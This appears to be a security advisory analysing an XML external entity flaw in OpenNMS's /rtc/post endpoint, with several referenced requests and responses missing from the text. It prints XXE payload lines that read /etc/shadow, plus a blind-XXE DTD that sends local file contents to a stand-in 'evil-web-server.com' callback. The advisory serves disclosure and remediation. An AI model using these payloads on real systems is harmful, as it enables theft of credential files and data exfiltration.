CyRC Vulnerability Analysis: XML external entity injection vulnerability in OpenNMS

The matching HTTP response is this.

A malicious HTTP request is expected to look like this.

The matching HTTP response is this.

The malicious payload is an XML document with an embedded entity reference. The purpose of this payload is to access the contents of the /etc/shadow file, which is a sensitive system file containing password hashes on UXIX-like systems.

Here's a breakdown of what's happening in the payload (HTTP request body).

·       <!DOCTYPE replace [...] >: This is a document type definition (DTD) declaration. It defines an entity called "ent" that is intended to be replaced with the contents of the file specified in the SYSTEM attribute.

·       <!ENTITY ent SYSTEM "file:///etc/shadow">: This defines an entity named "ent" that refers to the content of the /etc/shadow file using the "file://" protocol. In essence, it's an attempt to include the contents of this file into the XML document.

·       <userInfo>: This is the opening tag of an XML element called "userInfo."

·       <firstName>John</firstName>: This is an XML element called "firstName" with the value "John."

·       <lastName>&ent;</lastName>: This is an XML element called "lastName" where the content is being replaced with the value of the "ent" entity. Since "ent" is defined to reference the contents of the /etc/shadow file, this is an attempt to include the file content within the XML.

In summary, this payload tries to exploit a vulnerability in an XML parser by using entity expansion to access the contents of the /etc/shadow file. This technique is often used in XXE attacks. However, modern XML parsers are usually configured to prevent such attacks by disabling entity expansion from external sources, making this payload ineffective on properly configured systems.

XXE in OpenNMS

OpenNMS allows monitoring services and server availability. Incoming availability reports are handled (saved) by the: /rtc/post endpoint defined in

opennms-webapp/src/main/java/org/opennms/web/category/RTCPostServlet.java

The XML unmarshal sink is (indirectly) invoked by line 9, JaxbUtils.unmarshal, which unmarshals the XML from the HTTP request body into a org.OpenNMS.netmgt.xml.rtc.EuiLevel instance. At first glance this code does not seem to be vulnerable to XXE since the HTTP response does not contain any data from the XML. However, the XML parser configuration are too permissive.

The getXMLFilterForClass function is eventually invoked by JaxbUtils.unmarshal, and the disableDOCTYPE parameter value is false. As a result lines 7 through 9 are skipped, which means the XML parser will use a configuration that is vulnerable to XXE injection, that is, the parser will

·       Include external general entities

·       Include external parameter entities and the external DTD subset

While unmarshaling an XML document. Here is an example of a legitimate HTTP request and response (/rtc/post endpoint).

The matching response this.

An initial HTTP request to /rtc/post endpoint (from an attacker to an OpenNMS instance) is this.

The provided XML payload includes a document type declaration (DTD) that defines some entities and their values. The payload references an external DTD file located at 'http://evil-web-server/external_document_type_definition.dtd'.

The payload references an external DTD file located at 'http://evil-web-server.com/external_document_type_definition.dtd', which contains additional entity definitions.

The payload then uses the defined entities `%externalDTD;` and `%callbackEntity;`, which would be replaced with their corresponding values from the DTD. Finally, the payload contains an `<a>` element with the content `&remoteFileContent;`, which would also be replaced with its value based on the DTD. However, since this is a blind XXE, the attacker is not able to see the returned XML.

The XML parser initiates a request to 'http://evil-web-server.com/external_document_type_definition.dtd'' (from OpenNMS instance to the attacker-controlled web server).

The evil web server responds with the content of the ‘external_document_type_definition.dtd’ file (from evil web server to OpenNMS instance).

·        `<!ENTITY % localFileContent SYSTEM 'file:///usr/share/opennms/karaf.pid'>`:  This entity declaration defines `%localFileContent` to point to a specific local file path.

·       (`/usr/share/opennms/karaf.pid`) is a placeholder for the content of the local file.

·        `<!ENTITY % callbackEntity "<!ENTITY remoteFileContent SYSTEM 'http://evil-web-server.com/callback/?%localFileContent;'>">`: This entity declaration creates `%callbackEntity`, which in turn creates another entity, `%remoteFileContent`. The `%remoteFileContent` entity is designed to fetch the content of the local file specified by `%localFileContent` and send it as a HTTP query parameter to a remote server hosted at `http://evil-web-server.com/callback/?<file-content>`.

The exploit lies in the ability to include external entities from both local and remote sources. In this payload

·        `%localFileContent` tries to access a local file, possibly containing sensitive information. Since the XML parser is configured to process external entities, the content of the specified local file (`karaf.pid`) could be retrieved and used.

·        `%callbackEntity` sets up an entity that fetches the content of the local file using `%localFileContent` and sends it to a remote server via an HTTP request to `http://evil-web-server.com/callback/`.

This is an example of data exfiltration, where the content of the local file is potentially leaked to an external attacker-controlled server. Note that since the file content is sent as a HTTP query parameter the following two conditions must be met:

·       The exfiltrated file must be a text file.

·       It must have exactly one line of text.

Callback to the evil web server in attempt to resolve the ‘callbackEntity’ XML entity (from OpenNMS to evil web server).

Eventually, a developer will have to fix the XXE, and the stack trace shown here will help determine the vulnerable XML parser instance.

Tainted data flow visualization from source to sink.